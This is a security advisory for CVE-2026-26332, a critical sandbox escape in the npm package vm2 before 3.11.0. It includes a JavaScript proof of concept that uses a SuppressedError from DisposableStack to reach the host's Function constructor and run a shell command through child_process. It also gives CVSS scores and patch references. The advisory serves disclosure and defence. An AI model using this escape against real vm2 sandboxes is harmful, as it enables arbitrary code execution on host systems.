CVE-2026-26332
Severity: CRITICAL 9.8 | EPSS 0.08%
VM2 Has a Sandbox Escape Issue via SuppressedError
Published: 5/5/2026 | Modified: 5/5/2026
Description
In vm2 v3.10.4 on Node.js v24.13.0, `SuppressedError` allows attackers to escape the sandbox and run arbitrary code.

### PoC

```js
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
const ds = new DisposableStack();
ds.defer(() => { throw null; });
ds.defer(() => {
  const e = Error();
  e.name = Symbol();
  e.stack;
});
try {
  // dispose() runs the deferred callbacks in LIFO order; both throw,
  // so it raises a SuppressedError whose .suppressed is the earlier error
  ds.dispose();
} catch (e) {
  // the suppressed error was created outside the sandbox's proxies,
  // so its constructor chain reaches the host realm's Function
  const Function = e.suppressed.constructor.constructor;
  const process = new Function("return process;")();
  const { execSync } = process.mainModule.require("node:child_process");
  execSync("echo pwned", { stdio: "inherit" });
}
`);
```
Affected packages (1)
- npm/vm2: versions from 0, < 3.11.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL 9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
References (9)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2026-26332
- PATCH: https://github.com/patriksimek/vm2
- WEB: https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0
- WEB: https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
- WEB: https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca
- WEB: https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d
- WEB: https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
- WEB: https://github.com/patriksimek/vm2/releases/tag/v3.11.0
- WEB: https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95